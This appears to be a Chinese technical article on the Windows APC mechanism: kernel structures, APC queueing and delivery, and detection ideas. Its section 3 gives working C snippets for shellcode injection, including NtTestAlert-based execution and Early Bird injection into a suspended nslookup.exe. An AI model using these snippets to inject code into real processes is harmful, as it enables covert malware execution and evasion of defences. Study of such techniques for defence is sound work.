Windows APC机制与APC注入技术详解<\/h1>

1. APC基础概念<\/h2>

APC（Asynchronous Procedure Calls，异步过程调用）是Windows提供的一种机制，允许在特定线程上下文中异步执行函数。APC分为两种模式：<\/p>

用户模式APC<\/strong>：在用户空间执行<\/li>

内核模式APC<\/strong>：在内核空间执行<\/li> <\/ul>
1.1 内核数据结构<\/h3>
APC相关的关键数据结构位于_KTHREAD<\/code>中：<\/p>
struct<\/span> _KTHREAD { <\/span><\/span> _KAPC_STATE ApcState; \/\/ 存储APC状态 <\/span><\/span><\/span><\/span> UCHAR Alerted[2<\/span>]; \/\/ 内核和用户是否处于可警告状态 <\/span><\/span><\/span><\/span> ULONG Alertable; \/\/ 是否可被唤醒 <\/span><\/span><\/span><\/span> ULONG ApcQueueable; \/\/ 是否允许APC插入队列 <\/span><\/span><\/span><\/span> _KAPC_STATE *<\/span>ApcStatePointer[2<\/span>]; \/\/ 存储ApcState和SavedApcState <\/span><\/span><\/span><\/span> UCHAR ApcStateIndex; \/\/ 是否挂靠 <\/span><\/span><\/span><\/span> ULONG ApcInterruptRequest; \/\/ 此线程是否能执行APC <\/span><\/span><\/span><\/span> SHORT KernelApcDisable; \/\/ 关闭内核APC <\/span><\/span><\/span><\/span> SHORT SpecialApcDisable; \/\/ 关闭紧急APC <\/span><\/span><\/span><\/span>}; <\/span><\/span><\/code><\/pre>_KAPC_STATE<\/code>结构包含：<\/p> struct<\/span> _KAPC_STATE { <\/span><\/span> LIST_ENTRY ApcListHead[2<\/span>]; \/\/ 内核和用户APC链表 <\/span><\/span><\/span><\/span> KPROCESS *<\/span>Process; \/\/ 挂靠的进程 <\/span><\/span><\/span><\/span> BOOLEAN KernelApcInProgress; \/\/ 内核APC是否正在执行 <\/span><\/span><\/span><\/span> BOOLEAN KernelApcPending; \/\/ 内核APC链表中是否有值 <\/span><\/span><\/span><\/span> BOOLEAN UserApcInProgress; \/\/ 用户APC是否正在执行 <\/span><\/span><\/span><\/span> BOOLEAN UserApcPending; \/\/ 用户APC链表中是否有值 <\/span><\/span><\/span><\/span>}; <\/span><\/span><\/code><\/pre>1.2 APC结构<\/h3> struct<\/span> _KAPC { <\/span><\/span> UCHAR Type; \/\/ 0x0 <\/span><\/span><\/span><\/span> UCHAR SpareByte0; \/\/ 0x1 <\/span><\/span><\/span><\/span> UCHAR Size; \/\/ 0x2 <\/span><\/span><\/span><\/span> UCHAR SpareByte1; \/\/ 0x3 <\/span><\/span><\/span><\/span> ULONG SpareLong0; \/\/ 0x4 <\/span><\/span><\/span><\/span> struct<\/span> _KTHREAD *<\/span>Thread; \/\/ 所属线程 <\/span><\/span><\/span><\/span> struct<\/span> _LIST_ENTRY ApcListEntry; \/\/ 链表项 <\/span><\/span><\/span><\/span> VOID (*<\/span>KernelRoutine)(struct<\/span> _KAPC *<\/span>arg1, VOID (**<\/span>arg2)(VOID *<\/span>arg1, VOID *<\/span>arg2, VOID *<\/span>arg3), VOID **<\/span>arg3, VOID **<\/span>arg4, VOID **<\/span>arg5); \/\/ 内核回调 <\/span><\/span><\/span><\/span> VOID (*<\/span>RundownRoutine)(struct<\/span> _KAPC *<\/span>arg1); \/\/ 清理回调 <\/span><\/span><\/span><\/span> VOID (*<\/span>NormalRoutine)(VOID *<\/span>arg1, VOID *<\/span>arg2, VOID *<\/span>arg3); \/\/ 常规APC回调 <\/span><\/span><\/span><\/span> VOID *<\/span>NormalContext; \/\/ 常规上下文 <\/span><\/span><\/span><\/span> VOID *<\/span>SystemArgument1; \/\/ 系统参数1 <\/span><\/span><\/span><\/span> VOID *<\/span>SystemArgument2; \/\/ 系统参数2 <\/span><\/span><\/span><\/span> CHAR ApcStateIndex; \/\/ _KAPC_ENVIRONMENT枚举值 <\/span><\/span><\/span><\/span> CHAR ApcMode; \/\/ 用户还是内核 <\/span><\/span><\/span><\/span> UCHAR Inserted; \/\/ 是否被插入过 <\/span><\/span><\/span><\/span>}; <\/span><\/span><\/code><\/pre>1.3 APC环境枚举<\/h3> typedef<\/span> enum<\/span> _KAPC_ENVIRONMENT { <\/span><\/span> OriginalApcEnvironment, \/\/ 插入到不挂靠的环境 <\/span><\/span><\/span><\/span> AttachedApcEnvironment, \/\/ 插入到挂靠的环境(初始化时插入) <\/span><\/span><\/span><\/span> CurrentApcEnvironment, \/\/ 当前环境 <\/span><\/span><\/span><\/span> InsertApcEnvironment \/\/ 初始化时不插入，调用insertApc时判断 <\/span><\/span><\/span><\/span>} KAPC_ENVIRONMENT; <\/span><\/span><\/code><\/pre>2. APC初始化与插入<\/h2> 2.1 初始化APC<\/h3> VOID KeInitializeApc<\/span>( <\/span><\/span> __out PRKAPC Apc, <\/span><\/span> __in PRKTHREAD Thread, <\/span><\/span> __in KAPC_ENVIRONMENT Environment, <\/span><\/span> __in PKKERNEL_ROUTINE KernelRoutine, <\/span><\/span> __in_opt PKRUNDOWN_ROUTINE RundownRoutine, <\/span><\/span> __in_opt PKNORMAL_ROUTINE NormalRoutine, <\/span><\/span> __in_opt KPROCESSOR_MODE ApcMode, <\/span><\/span> __in_opt PVOID NormalContext <\/span><\/span>); <\/span><\/span><\/code><\/pre>2.2 插入APC队列<\/h3> BOOLEAN KeInsertQueueApc<\/span>( <\/span><\/span> __inout PRKAPC Apc, <\/span><\/span> __in_opt PVOID SystemArgument1, <\/span><\/span> __in_opt PVOID SystemArgument2, <\/span><\/span> __in KPRIORITY Increment <\/span><\/span>); <\/span><\/span><\/code><\/pre>KeInsertQueueApc<\/code>内部调用KiInsertQueueApc<\/code>，根据条件将APC插入到对应链表中：<\/p> 内核APC：<\/p> 如果没有NormalContext<\/code>，是紧急内核APC，插入链表头部紧急区域尾部<\/li> 否则直接插入链表尾部<\/li> <\/ul> <\/li> 用户APC：<\/p> 如果没有NormalRoutine<\/code>且KernelRoutine<\/code>为PsExitSpecialApc<\/code>地址，插入到头部紧急区域头部<\/li> <\/ul> <\/li> <\/ol> 2.3 APC执行流程<\/h3> APC的实际执行在KiDeliverApc<\/code>中完成：<\/p> 遍历APC链表，逐一取出并调用<\/li> 先调用紧急APC，然后是内核APC，最后进入用户模式APC<\/li> 紧急APC的IRQL等级是2，线程切换无法打断<\/li> <\/ol> 3. APC注入技术<\/h2> 3.1 可警告状态<\/h3> 线程通过调用某些API进入可警告状态（Alertable=1）：<\/p> WaitForSingleObject<\/code><\/li> WaitForMultipleObjects<\/code><\/li> SleepEx<\/code><\/li> <\/ul> 3.2 基本APC注入<\/h3> 使用QueueUserAPC<\/code>函数将用户模式APC对象添加到指定线程的APC队列：<\/p> #include<\/span> <Windows.h><\/span> <\/span><\/span><\/span>#include<\/span> <iostream><\/span> <\/span><\/span><\/span><\/span> <\/span><\/span>void<\/span> CALLBACK test<\/span>(ULONG_PTR Parameter) { <\/span><\/span> MessageBox(0<\/span>, 0<\/span>, 0<\/span>, 0<\/span>); <\/span><\/span>} <\/span><\/span> <\/span><\/span>int<\/span> main<\/span>() { <\/span><\/span> QueueUserAPC(test, GetCurrentThread(), 0<\/span>); <\/span><\/span> SleepEx(1000<\/span>, TRUE); <\/span><\/span>} <\/span><\/span><\/code><\/pre>3.3 基于NtTestAlert的注入<\/h3> typedef<\/span> NTSTATUS<\/span>(NTAPI*<\/span> pNtTestAlert)(); <\/span><\/span> <\/span><\/span>void<\/span> ntAlertApc<\/span>() { <\/span><\/span> pNtTestAlert NtTestAlert =<\/span> (pNtTestAlert)GetProcAddress(LoadLibraryA("ntdll.dll"<\/span>), "NtTestAlert"<\/span>); <\/span><\/span> <\/span><\/span> DWORD dwOldProtection =<\/span> NULL; <\/span><\/span> LPVOID lpMem =<\/span> NULL; <\/span><\/span> lpMem =<\/span> VirtualAlloc(NULL, sizeof<\/span>(shellcode), MEM_COMMIT |<\/span> MEM_RESERVE, PAGE_READWRITE); <\/span><\/span> memcpy(lpMem, shellcode, sizeof<\/span>(shellcode)); <\/span><\/span> VirtualProtect(lpMem, sizeof<\/span>(shellcode), PAGE_EXECUTE_READWRITE, &<\/span>dwOldProtection); <\/span><\/span> <\/span><\/span> QueueUserAPC((PAPCFUNC)lpMem, GetCurrentThread(), 0<\/span>); <\/span><\/span> NtTestAlert(); <\/span><\/span>} <\/span><\/span><\/code><\/pre>3.4 Early Bird APC注入<\/h3> 创建进程时指定CREATE_SUSPENDED<\/code>标志，使进程挂起：<\/p> STARTUPINFO si =<\/span> { sizeof<\/span>(STARTUPINFO) }; <\/span><\/span>PROCESS_INFORMATION pi; <\/span><\/span>LPVOID lpMem; <\/span><\/span>ULONG dwBytesWritten; <\/span><\/span>DWORD dwOldProtection; <\/span><\/span> <\/span><\/span>CreateProcess(NULL, _wcsdup(L<\/span>"C:<\/span>\\<\/span>Windows<\/span>\\<\/span>System32<\/span>\\<\/span>nslookup.exe"<\/span>), <\/span><\/span> NULL, NULL, false, CREATE_SUSPENDED, NULL, NULL, &<\/span>si, &<\/span>pi); <\/span><\/span> <\/span><\/span>lpMem =<\/span> VirtualAllocEx(pi.hProcess, NULL, sizeof<\/span>(shellcode), MEM_COMMIT |<\/span> MEM_RESERVE, PAGE_READWRITE); <\/span><\/span>WriteProcessMemory(pi.hProcess, lpMem, shellcode, sizeof<\/span>(shellcode), &<\/span>dwBytesWritten); <\/span><\/span>VirtualProtectEx(pi.hProcess, lpMem, sizeof<\/span>(shellcode), PAGE_EXECUTE_READWRITE, &<\/span>dwOldProtection); <\/span><\/span> <\/span><\/span>QueueUserAPC((PAPCFUNC)lpMem, pi.hThread, 0<\/span>); <\/span><\/span>ResumeThread(pi.hThread); <\/span><\/span>WaitForSingleObject(pi.hThread, -<\/span>1<\/span>); <\/span><\/span><\/code><\/pre>3.5 基于调试的Early Bird APC注入<\/h3> 创建进程时指定DEBUG_PROCESS<\/code>标志：<\/p> CreateProcess(NULL, _wcsdup(L<\/span>"C:<\/span>\\<\/span>Windows<\/span>\\<\/span>System32<\/span>\\<\/span>nslookup.exe"<\/span>), <\/span><\/span> NULL, NULL, false, DEBUG_PROCESS, NULL, NULL, &<\/span>si, &<\/span>pi); <\/span><\/span> <\/span><\/span>lpMem =<\/span> VirtualAllocEx(pi.hProcess, NULL, sizeof<\/span>(shellcode), MEM_COMMIT |<\/span> MEM_RESERVE, PAGE_READWRITE); <\/span><\/span>WriteProcessMemory(pi.hProcess, lpMem, shellcode, sizeof<\/span>(shellcode), &<\/span>dwBytesWritten); <\/span><\/span>VirtualProtectEx(pi.hProcess, lpMem, sizeof<\/span>(shellcode), PAGE_EXECUTE_READWRITE, &<\/span>dwOldProtection); <\/span><\/span> <\/span><\/span>QueueUserAPC((PAPCFUNC)lpMem, pi.hThread, 0<\/span>); <\/span><\/span>DebugActiveProcessStop(pi.dwProcessId); <\/span><\/span><\/code><\/pre>4. 关键API<\/h2> SleepEx<\/strong>：<\/p> DWORD SleepEx<\/span>( <\/span><\/span> DWORD dwMilliseconds, <\/span><\/span> BOOL bAlertable <\/span><\/span>); <\/span><\/span><\/code><\/pre><\/li> QueueUserAPC<\/strong>：<\/p> DWORD QueueUserAPC<\/span>( <\/span><\/span> PAPCFUNC pfnAPC, <\/span><\/span> HANDLE hThread, <\/span><\/span> ULONG_PTR dwData <\/span><\/span>); <\/span><\/span><\/code><\/pre><\/li> NtTestAlert<\/strong>：<\/p> NTSTATUS NtTestAlert<\/span>(VOID); <\/span><\/span><\/code><\/pre><\/li> <\/ol> 5. 防御与检测<\/h2> APC注入技术可以被以下方式检测和防御：<\/p> 监控可疑的APC队列操作<\/strong><\/li> 检查线程的Alertable状态异常修改<\/strong><\/li> 检测Early Bird技术创建的挂起进程<\/strong><\/li> 监控调试器附加行为<\/strong><\/li> 使用ETW（Event Tracing for Windows）跟踪APC活动<\/strong><\/li> <\/ol> 6. 总结<\/h2> APC机制是Windows系统中强大的异步执行机制，既可用于合法用途，也可被恶意软件利用进行代码注入。理解APC的内部工作原理对于系统开发人员和安全研究人员都至关重要。通过深入分析_KTHREAD<\/code>和_KAPC<\/code>等内核数据结构，可以更好地理解APC的执行流程和注入技术原理。<\/p>